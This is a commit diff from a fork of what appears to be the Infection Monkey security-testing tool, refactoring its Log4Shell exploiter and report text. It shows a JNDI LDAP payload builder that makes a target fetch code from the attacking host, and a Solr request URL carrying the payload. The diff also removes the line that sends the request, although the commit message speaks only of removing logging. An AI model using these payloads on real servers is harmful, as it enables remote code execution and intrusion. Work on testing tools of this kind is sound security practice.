forked from p15670423/monkey
Agent, Island: Minor changes to Log4Shell
Return types, removing logging from solr service and change Log4j to Log4Shell in Island reporting
This commit is contained in:
parent
311a721880
commit
51bf553fb5
|
@ -116,12 +116,12 @@ class Log4ShellExploiter(WebRCE):
|
|||
|
||||
self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT)
|
||||
|
||||
def _build_ldap_payload(self):
|
||||
def _build_ldap_payload(self) -> str:
|
||||
interface_ip = get_interface_to_target(self.host.ip_addr)
|
||||
return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}"
|
||||
|
||||
# TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command
|
||||
def _build_command(self, path, http_path):
|
||||
def _build_command(self, path, http_path) -> str:
|
||||
# Build command to execute
|
||||
monkey_cmd = build_monkey_commandline(
|
||||
self.host, get_monkey_depth() - 1, vulnerable_port=None, location=path
|
||||
|
|
|
@ -15,8 +15,6 @@ class SolrExploit(IServiceExploiter):
|
|||
def trigger_exploit(payload: str, host: VictimHost, port: int):
|
||||
url = f"http://{host.ip_addr}:{port}/solr/admin/cores?fu={payload}"
|
||||
try:
|
||||
logger.debug("Sending malicious SOLR log4j request")
|
||||
requests.post(url, timeout=5, verify=False) # noqa DUO123
|
||||
logger.debug("Request sent")
|
||||
except requests.ReadTimeout as e:
|
||||
logger.debug(f"Log4shell request failed {e}")
|
||||
|
|
|
@ -55,7 +55,7 @@ class ExploiterDescriptorEnum(Enum):
|
|||
POWERSHELL = ExploiterDescriptor(
|
||||
"PowerShellExploiter", "PowerShell Remoting Exploiter", ExploitProcessor
|
||||
)
|
||||
LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4j Exploiter", Log4ShellProcessor)
|
||||
LOG4SHELL = ExploiterDescriptor("Log4ShellExploiter", "Log4Shell Exploiter", Log4ShellProcessor)
|
||||
|
||||
@staticmethod
|
||||
def get_by_class_name(class_name: str) -> ExploiterDescriptor:
|
||||
|
|
|
@ -2,19 +2,19 @@ import React from 'react';
|
|||
import CollapsibleWellComponent from '../CollapsibleWell';
|
||||
|
||||
export function log4shellIssueOverview() {
|
||||
return (<li>Some servers are vulnerable to log4shell remote code execution exploit.</li>)
|
||||
return (<li>Some servers are vulnerable to the Log4Shell remote code execution exploit.</li>)
|
||||
}
|
||||
|
||||
export function log4shellIssueReport(issue) {
|
||||
return (
|
||||
<>
|
||||
Upgrade the log4j component to version 2.15.0 or later.
|
||||
Upgrade the Apache Log4j component to version 2.15.0 or later.
|
||||
<CollapsibleWellComponent>
|
||||
The {issue.service} server <span className="badge badge-primary">{issue.machine}</span> (<span
|
||||
className="badge badge-info" style={{margin: '2px'}}>{issue.ip_address}:{issue.port}</span>) is vulnerable to <span
|
||||
className="badge badge-danger">log4shell remote code execution</span> attack.
|
||||
className="badge badge-danger">the Log4Shell remote code execution</span> attack.
|
||||
<br/>
|
||||
The attack was made possible due to an old version of log4j component.
|
||||
The attack was made possible due to an old version of Apache Log4j component.
|
||||
</CollapsibleWellComponent>
|
||||
</>
|
||||
);
|
||||
|
|
Loading…
Reference in New Issue